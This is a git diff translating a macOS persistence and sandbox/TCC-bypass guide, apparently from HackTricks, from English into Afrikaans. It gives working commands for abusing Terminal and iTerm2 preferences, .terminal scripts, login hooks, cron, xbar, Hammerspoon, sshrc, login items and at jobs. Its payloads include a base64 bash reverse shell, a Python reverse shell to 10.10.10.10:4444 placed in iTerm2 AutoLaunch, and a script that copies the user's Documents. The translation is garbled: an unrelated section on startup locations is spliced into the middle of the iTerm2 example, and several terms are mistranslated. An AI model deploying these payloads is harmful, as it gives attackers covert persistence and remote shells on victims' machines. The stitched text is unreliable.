-The UUID can be found listing that directory or with `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` - -To check the applications that will be reopened you can do: +Die UUID kan gevind word deur daardie gids te lys of met `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` +Om die toepassings wat heropen sal word te kontroleer, kan jy die volgende doen: ```bash defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin #or plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` - -To **add an application to this list** you can use: - +Om 'n toepassing by hierdie lys te **voeg**, kan jy die volgende gebruik: ```bash # Adding iTerm2 /usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ - ~/Library/Preferences/ByHost/com.apple.loginwindow..plist +-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ +~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` +### Terminal Voorkeure -### Terminal Preferences +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* Terminal gebruik om FDA-toestemmings van die gebruiker te hê -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * Terminal use to have FDA permissions of the user use it - -#### Location +#### Ligging * **`~/Library/Preferences/com.apple.Terminal.plist`** - * **Trigger**: Open Terminal +* **Trigger**: 
Open Terminal -#### Description & Exploitation +#### Beskrywing & Uitbuiting -In **`~/Library/Preferences`** are store the preferences of the user in the Applications. Some of these preferences can hold a configuration to **execute other applications/scripts**. +In **`~/Library/Preferences`** word die voorkeure van die gebruiker in die Toepassings gestoor. Sommige van hierdie voorkeure kan 'n konfigurasie hê om **ander toepassings/scripts uit te voer**. -For example, the Terminal can execute a command in the Startup: +Byvoorbeeld, die Terminal kan 'n opdrag uitvoer by die Begin:
-This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal.plist`** like this: - +Hierdie konfigurasie word weerspieël in die lêer **`~/Library/Preferences/com.apple.Terminal.plist`** soos volg: ```bash [...] "Window Settings" => { - "Basic" => { - "CommandString" => "touch /tmp/terminal_pwn" - "Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } - "FontAntialias" => 1 - "FontWidthSpacing" => 1.004032258064516 - "name" => "Basic" - "ProfileCurrentVersion" => 2.07 - "RunCommandAsShell" => 0 - "type" => "Window Settings" - } +"Basic" => { +"CommandString" => "touch /tmp/terminal_pwn" +"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } +"FontAntialias" => 1 +"FontWidthSpacing" => 1.004032258064516 +"name" => "Basic" +"ProfileCurrentVersion" => 2.07 +"RunCommandAsShell" => 0 +"type" => "Window Settings" +} [...] ``` +So, as die plist van die voorkeure van die terminal in die stelsel oorgeskryf kan word, kan die **`open`** funksionaliteit gebruik word om die terminal te **open en daardie opdrag uit te voer**. -So, if the plist of the preferences of the terminal in the system could be overwritten, the the **`open`** functionality can be used to **open the terminal and that command will be executed**. - -You can add this from the cli with: +Jy kan dit vanaf die opdraglyn byvoeg met: {% code overflow="wrap" %} ```bash 
@@ -237,23 +225,22 @@ You can add this from the cli with: ``` {% endcode %} -### Terminal Scripts / Other file extensions +### Terminal Skripte / Ander lêeruitbreidings -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * Terminal use to have FDA permissions of the user use it +* Nuttig om sanderige omgewing te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* Terminal gebruik om FDA-toestemmings van die gebruiker te hê -#### Location +#### Plek -* **Anywhere** - * **Trigger**: Open Terminal +* **Enige plek** +* **Trigger**: Open Terminal -#### Description & Exploitation +#### Beskrywing & Uitbuiting -If you create a [**`.terminal`** script](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) and opens, the **Terminal application** will be automatically invoked to execute the commands indicated in there. If the Terminal app has some special privileges (such as TCC), your command will be run with those special privileges. - -Try it with: +As jy 'n [**`.terminal`** skrip](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) skep en dit oopmaak, sal die **Terminal-toepassing** outomaties geaktiveer word om die opdragte wat daarin aangedui is, uit te voer. As die Terminal-toepassing spesiale voorregte het (soos TCC), sal jou opdrag met daardie spesiale voorregte uitgevoer word. +Probeer dit met: ```bash # Prepare the payload cat > /tmp/test.terminal << EOF 
@@ -261,16 +248,16 @@ cat > /tmp/test.terminal << EOF - CommandString - mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; - ProfileCurrentVersion - 2.0600000000000001 - RunCommandAsShell - - name - exploit - type - Window Settings +CommandString +mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; +ProfileCurrentVersion +2.0600000000000001 +RunCommandAsShell + +name +exploit +type +Window Settings EOF 
@@ -281,49 +268,48 @@ open /tmp/test.terminal # Use something like the following for a reverse shell: echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash; ``` - -You could also use the extensions **`.command`**, **`.tool`**, with regular shell scripts content and they will be also opened by Terminal. +Jy kan ook die uitbreidings **`.command`** en **`.tool`** gebruik, met gewone skripsinhoud, en dit sal ook deur Terminal geopen word. {% hint style="danger" %} -If terminal has **Full Disk Access** it will be able to complete that action (note that the command executed will be visible in a terminal window). +As die terminal **Volle Disktoegang** het, sal dit in staat wees om daardie aksie te voltooi (let daarop dat die uitgevoerde bevel sigbaar sal wees in 'n terminal-venster). {% endhint %} -### Audio Plugins +### Klankinvoegtoepassings Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\ Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * You might get some extra TCC access +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Jy kan dalk ekstra TCC-toegang kry -#### Location +#### Plek * **`/Library/Audio/Plug-Ins/HAL`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar * **`/Library/Audio/Plug-ins/Components`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar * **`~/Library/Audio/Plug-ins/Components`** - * **Trigger**: Restart coreaudiod or the computer +* **Trigger**: Herlaai coreaudiod of 
die rekenaar * **`/System/Library/Components`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar -#### Description +#### Beskrywing -According to the previous writeups it's possible to **compile some audio plugins** and get them loaded. +Volgens die vorige writeups is dit moontlik om **sekere klankinvoegtoepassings te kompileer** en hulle te laai. -### QuickLook Plugins +### QuickLook-invoegtoepassings Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * You might get some extra TCC access +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Jy kan dalk ekstra TCC-toegang kry -#### Location +#### Plek * `/System/Library/QuickLook` * `/Library/QuickLook` 
@@ -331,30 +317,29 @@ Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit. * `/Applications/AppNameHere/Contents/Library/QuickLook/` * `~/Applications/AppNameHere/Contents/Library/QuickLook/` -#### Description & Exploitation +#### Beskrywing & Uitbuiting -QuickLook plugins can be executed when you **trigger the preview of a file** (press space bar with the file selected in Finder) and a **plugin supporting that file type** is installed. +QuickLook-invoegtoepassings kan uitgevoer word wanneer jy die voorbeeld van 'n lêer aktiveer (druk die spasiestang met die lêer geselekteer in Finder) en 'n invoegtoepassing wat daardie lêertipe ondersteun, geïnstalleer is. -It's possible to compile your own QuickLook plugin, place it in one of the previous locations to load it and then go to a supported file and press space to trigger it. +Dit is moontlik om jou eie QuickLook-invoegtoepassing te kompileer, dit in een van die vorige plekke te plaas om dit te laai, en dan na 'n ondersteunde lêer te gaan en spasiestang te druk om dit te aktiveer. -### ~~Login/Logout Hooks~~ +### ~~Aanteken-/Afmeldingshakies~~ {% hint style="danger" %} -This didn't work for me, neither with the user LoginHook nor with the root LogoutHook +Dit het nie vir my gewerk nie, nie met die gebruiker LoginHook nie, of met die root LogoutHook nie. 
{% endhint %} **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek -* You need to be able to execute something like `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` - * `Lo`cated in `~/Library/Preferences/com.apple.loginwindow.plist` - -They are deprecated but can be used to execute commands when a user logs in. +* Jy moet in staat wees om iets soos `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` uit te voer +* Geleë in `~/Library/Preferences/com.apple.loginwindow.plist` +Hulle is verouderd, maar kan gebruik word om bevele uit te voer wanneer 'n gebruiker aanmeld. ```bash cat > $HOME/hook.sh << EOF #!/bin/bash 
@@ -364,98 +349,86 @@ chmod +x $HOME/hook.sh defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh ``` - -This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` - +Hierdie instelling word gestoor in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` ```bash defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist { - LoginHook = "/Users/username/hook.sh"; - LogoutHook = "/Users/username/hook.sh"; - MiniBuddyLaunch = 0; - TALLogoutReason = "Shut Down"; - TALLogoutSavesState = 0; - oneTimeSSMigrationComplete = 1; +LoginHook = "/Users/username/hook.sh"; +LogoutHook = "/Users/username/hook.sh"; +MiniBuddyLaunch = 0; +TALLogoutReason = "Shut Down"; +TALLogoutSavesState = 0; +oneTimeSSMigrationComplete = 1; } ``` - -To delete it: - +Om dit te verwyder: ```bash defaults delete com.apple.loginwindow LoginHook defaults delete com.apple.loginwindow LogoutHook ``` +Die root-gebruiker een is gestoor in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** -The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** - -## Conditional Sandbox Bypass +## Voorwaardelike Sandboksverbyloop {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **expecting not super common conditions** like specific **programs installed, "uncommon" user** actions or environments. +Hier kan jy beginplekke vind wat nuttig is vir **sandboksverbyloop** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** en **nie baie algemene voorwaardes** soos spesifieke **geïnstalleerde programme, "ongewone" gebruiker**-aksies of omgewings te verwag nie. 
{% endhint %} ### Cron **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * However, you need to be able to execute `crontab` binary - * Or be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te verbyloop: [✅](https://emojipedia.org/check-mark-button) +* Jy moet egter in staat wees om die `crontab` binêre lêer uit te voer +* Of wees root +* TCC-verbyloop: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`** - * Root required for direct write access. No root required if you can execute `crontab ` - * **Trigger**: Depends on the cron job +* Root vereis vir direkte skryftoegang. Geen root vereis as jy `crontab ` kan uitvoer nie +* **Trigger**: Hang af van die cron-werk -#### Description & Exploitation - -List the cron jobs of the **current user** with: +#### Beskrywing & Uitbuiting +Lys die cron-werk van die **huidige gebruiker** met: ```bash crontab -l ``` +Jy kan ook al die cron take van die gebruikers sien in **`/usr/lib/cron/tabs/`** en **`/var/at/tabs/`** (vereis root). -You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** (needs root). - -In MacOS several folders executing scripts with **certain frequency** can be found in: - +In MacOS kan verskeie lêers gevind word wat skripte met **sekere frekwensie** uitvoer in: ```bash # The one with the cron jobs is /usr/lib/cron/tabs/ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/ ``` +Daar kan jy die gewone **cron** **take**, die **at** **take** (nie baie gebruik nie) en die **periodieke** **take** (hoofsaaklik gebruik vir skoonmaak van tydelike lêers) vind. Die daaglikse periodieke take kan byvoorbeeld uitgevoer word met: `periodic daily`. 
-There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`. - -To add a **user cronjob programatically** it's possible to use: - +Om 'n **gebruikers cronjob programmaties** by te voeg, is dit moontlik om te gebruik: ```bash echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron crontab /tmp/cron ``` - ### iTerm2 Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * iTerm2 use to have granted TCC permissions +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* iTerm2 gebruik om TCC-toestemmings te verleen -#### Locations +#### Plekke * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm * **`~/Library/Preferences/com.googlecode.iterm2.plist`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm -#### Description & Exploitation - -Scripts stored in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** will be executed. For example: +#### Beskrywing & Uitbuiting +Skripte wat gestoor word in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** sal uitgevoer word. Byvoorbeeld: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF #!/bin/bash 
@@ -464,51 +437,78 @@ EOF chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" ``` +# macOS Automatiese Beginplekke -or: +Hierdie dokument bevat 'n lys van die verskillende plekke waar programme geplaas kan word om outomaties te begin wanneer 'n macOS-stelsel opgestel word. Dit is nuttig vir die identifisering van moontlike aanvalsvektore en vir die hardening van 'n macOS-stelsel deur onnodige beginplekke te verwyder. +## Gebruikers Beginplekke + +### 1. `~/Library/LaunchAgents` + +Hierdie plek bevat gebruikerspecifieke beginplekke. Elke gebruiker kan programme plaas in hierdie gids om hulle outomaties te laat begin wanneer die gebruiker aanmeld. + +### 2. `/Library/LaunchAgents` + +Hierdie plek bevat beginplekke wat van toepassing is op alle gebruikers op die stelsel. Programme wat hier geplaas word, sal outomaties begin wanneer enige gebruiker aanmeld. + +### 3. `/Library/StartupItems` + +Hierdie plek bevat verouderde beginplekke wat gebruik is in vorige weergawes van macOS. Dit is nie meer 'n aanbevole plek vir die plaas van beginplekke nie. + +## Sisteem Beginplekke + +### 1. `/System/Library/LaunchDaemons` + +Hierdie plek bevat beginplekke wat deur die stelsel self gebruik word. Dit is belangrik om hierdie beginplekke te monitor en te verseker dat slegs vertroude programme hier geplaas word. + +### 2. `/Library/LaunchDaemons` + +Hierdie plek bevat beginplekke wat van toepassing is op alle gebruikers op die stelsel. Dit is 'n kritieke plek om te monitor en te verseker dat slegs vertroude programme hier geplaas word. + +### 3. `/System/Library/StartupItems` + +Soos met die gebruikers beginplekke, is hierdie plek verouderd en word dit nie meer aanbeveel vir die plaas van beginplekke nie. + +## Konklusie + +Die identifisering en monitering van outomatiese beginplekke op 'n macOS-stelsel is 'n belangrike stap in die hardening van die stelsel en die voorkoming van potensiële aanvalle. 
Deur slegs vertroude programme in die regte beginplekke te plaas en onnodige beginplekke te verwyder, kan die veiligheid van die stelsel verbeter word. ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF #!/usr/bin/env python3 import iterm2,socket,subprocess,os async def main(connection): - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); - async with iterm2.CustomControlSequenceMonitor( - connection, "shared-secret", r'^create-window$') as mon: - while True: - match = await mon.async_get() - await iterm2.Window.async_create(connection) +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); +async with iterm2.CustomControlSequenceMonitor( +connection, "shared-secret", r'^create-window$') as mon: +while True: +match = await mon.async_get() +await iterm2.Window.async_create(connection) iterm2.run_forever(main) EOF ``` - -The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed: - +Die skrip **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** sal ook uitgevoer word: ```bash do shell script "touch /tmp/iterm2-autolaunchscpt" ``` +Die iTerm2-voorkeure wat in **`~/Library/Preferences/com.googlecode.iterm2.plist`** geleë is, kan **'n opdrag aandui om uit te voer** wanneer die iTerm2-terminal geopen word. -The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2.plist`** can **indicate a command to execute** when the iTerm2 terminal is opened. - -This setting can be configured in the iTerm2 settings: +Hierdie instelling kan gekonfigureer word in die iTerm2-instellings:
-And the command is reflected in the preferences: - +En die opdrag word weerspieël in die voorkeure: ```bash plutil -p com.googlecode.iterm2.plist { - [...] - "New Bookmarks" => [ - 0 => { - [...] - "Initial Text" => "touch /tmp/iterm-start-command" +[...] +"New Bookmarks" => [ +0 => { +[...] +"Initial Text" => "touch /tmp/iterm-start-command" ``` - -You can set the command to execute with: +Jy kan die bevel instel om uit te voer met: {% code overflow="wrap" %} ```bash 
@@ -524,27 +524,26 @@ open /Applications/iTerm.app/Contents/MacOS/iTerm2 {% endcode %} {% hint style="warning" %} -Highly probable there are **other ways to abuse the iTerm2 preferences** to execute arbitrary commands. +Daar is 'n hoë waarskynlikheid dat daar **ander maniere is om die iTerm2-voorkeure** te misbruik om willekeurige bevele uit te voer. {% endhint %} ### xbar Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But xbar must be installed -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * It requests Accessibility permissions +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar xbar moet geïnstalleer word +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Dit vra toegang tot Toeganklikheid -#### Location +#### Plek * **`~/Library/Application\ Support/xbar/plugins/`** - * **Trigger**: Once xbar is executed +* **Trigger**: Sodra xbar uitgevoer word -#### Description - -If the popular program [**xbar**](https://github.com/matryer/xbar) is installed, it's possible to write a shell script in **`~/Library/Application\ Support/xbar/plugins/`** which will be executed when xbar is started: +#### Beskrywing +As die gewilde program [**xbar**](https://github.com/matryer/xbar) geïnstalleer is, is dit moontlik om 'n skripsie in die **`~/Library/Application\ Support/xbar/plugins/`** te skryf wat uitgevoer sal word wanneer xbar begin: ```bash cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF #!/bin/bash 
@@ -552,146 +551,133 @@ touch /tmp/xbar EOF chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh" ``` - ### Hammerspoon -**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/) +**Verslag**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But Hammerspoon must be installed -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * It requests Accessibility permissions +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar Hammerspoon moet geïnstalleer word +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Dit vra om Toeganklikheidsregte -#### Location +#### Plek * **`~/.hammerspoon/init.lua`** - * **Trigger**: Once hammerspoon is executed +* **Trigger**: Sodra Hammerspoon uitgevoer word -#### Description +#### Beskrywing -[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) serves as an automation platform for **macOS**, leveraging the **LUA scripting language** for its operations. Notably, it supports the integration of complete AppleScript code and the execution of shell scripts, enhancing its scripting capabilities significantly. - -The app looks for a single file, `~/.hammerspoon/init.lua`, and when started the script will be executed. +[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) dien as 'n outomatiseringsplatform vir **macOS**, wat die **LUA-skripseltaal** gebruik vir sy werking. Dit ondersteun veral die integrasie van volledige AppleScript-kode en die uitvoering van skulpskripte, wat sy skripskrag aansienlik verbeter. +Die toepassing soek na 'n enkele lêer, `~/.hammerspoon/init.lua`, en wanneer dit begin word, sal die skrips uitgevoer word. 
```bash mkdir -p "$HOME/.hammerspoon" cat > "$HOME/.hammerspoon/init.lua" << EOF hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2") EOF ``` - ### SSHRC Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But ssh needs to be enabled and used -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * SSH use to have FDA access +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar ssh moet geaktiveer en gebruik word +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* SSH gebruik om FDA-toegang te hê -#### Location +#### Plek * **`~/.ssh/rc`** - * **Trigger**: Login via ssh +* **Trigger**: Aanteken via ssh * **`/etc/ssh/sshrc`** - * Root required - * **Trigger**: Login via ssh +* Root vereis +* **Trigger**: Aanteken via ssh {% hint style="danger" %} -To turn ssh on requres Full Disk Access: - +Om ssh aan te skakel, vereis Volle Skyf Toegang: ```bash sudo systemsetup -setremotelogin on ``` {% endhint %} -#### Description & Exploitation +#### Beskrywing & Uitbuiting -By default, unless `PermitUserRC no` in `/etc/ssh/sshd_config`, when a user **logins via SSH** the scripts **`/etc/ssh/sshrc`** and **`~/.ssh/rc`** will be executed. +Standaard, tensy `PermitUserRC no` in `/etc/ssh/sshd_config`, wanneer 'n gebruiker **inlog via SSH** sal die skripte **`/etc/ssh/sshrc`** en **`~/.ssh/rc`** uitgevoer word. 
-### **Login Items** +### **Inlog Items** Writeup: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to execute `osascript` with args -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet `osascript` uitvoer met args +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### Plekke * **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** - * **Trigger:** Login - * Exploit payload stored calling **`osascript`** +* **Trigger:** Inlog +* Uitbuitingslading gestoor deur **`osascript`** te roep * **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** - * **Trigger:** Login - * Root required +* **Trigger:** Inlog +* Root vereis -#### Description - -In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\ -It it's possible to list them, add and remove from the command line: +#### Beskrywing +In Sisteemvoorkeure -> Gebruikers en Groepe -> **Inlog Items** kan jy **items vind wat uitgevoer word wanneer die gebruiker inlog**.\ +Dit is moontlik om hulle te lys, by te voeg en te verwyder vanaf die opdraglyn: ```bash #List all items: osascript -e 'tell application "System Events" to get the name of every login item' #Add an item: -osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' +osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' #Remove an item: -osascript -e 'tell application "System Events" to delete login item "itemname"' +osascript -e 'tell application "System Events" to delete login item "itemname"' ``` +Hierdie items word gestoor in die lêer 
**`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** -These items are stored in the file **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** +**Aanmeldingsitems** kan ook aangedui word deur die API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) te gebruik wat die konfigurasie in die lêer **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** stoor. -**Login items** can **also** be indicated in using the API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) which will store the configuration in **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** +### ZIP as Aanmeldingsitem -### ZIP as Login Item +(Kyk na die vorige afdeling oor Aanmeldingsitems, dit is 'n uitbreiding) -(Check previos section about Login Items, this is an extension) +As jy 'n **ZIP**-lêer as 'n **Aanmeldingsitem** stoor, sal die **`Archive Utility`** dit oopmaak en as die zip byvoorbeeld in **`~/Library`** gestoor is en die Gids **`LaunchAgents/file.plist`** met 'n agterdeur bevat, sal daardie gids geskep word (dit is nie standaard nie) en die plist sal bygevoeg word sodat die volgende keer as die gebruiker weer aanmeld, die **agterdeur wat in die plist aangedui word, uitgevoer sal word**. -If you store a **ZIP** file as a **Login Item** the **`Archive Utility`** will open it and if the zip was for example stored in **`~/Library`** and contained the Folder **`LaunchAgents/file.plist`** with a backdoor, that folder will be created (it isn't by default) and the plist will be added so the next time the user logs in again, the **backdoor indicated in the plist will be executed**. - -Another options would be to create the files **`.bash_profile`** and **`.zshenv`** inside the user HOME so if the folder LaunchAgents already exist this technique would still work. 
+'n Ander opsie sou wees om die lêers **`.bash_profile`** en **`.zshenv`** binne die gebruiker se TUISGIDS te skep, sodat as die Gids LaunchAgents alreeds bestaan, sal hierdie tegniek steeds werk. ### At Writeup: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to **execute** **`at`** and it must be **enabled** -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet **`at`** **uitvoer** en dit moet **geaktiveer** wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging -* Need to **execute** **`at`** and it must be **enabled** +* Moet **`at`** **uitvoer** en dit moet **geaktiveer** wees -#### **Description** +#### **Beskrywing** -`at` tasks are designed for **scheduling one-time tasks** to be executed at certain times. Unlike cron jobs, `at` tasks are automatically removed post-execution. It's crucial to note that these tasks are persistent across system reboots, marking them as potential security concerns under certain conditions. - -By **default** they are **disabled** but the **root** user can **enable** **them** with: +`at`-take is ontwerp vir die **skedulering van eenmalige take** wat op sekere tye uitgevoer moet word. In teenstelling met cron-take word `at`-take outomaties verwyder na uitvoering. Dit is belangrik om daarop te let dat hierdie take volhoubaar is oor stelselherlaai, wat hulle potensiële veiligheidskwessies onder sekere omstandighede maak. 
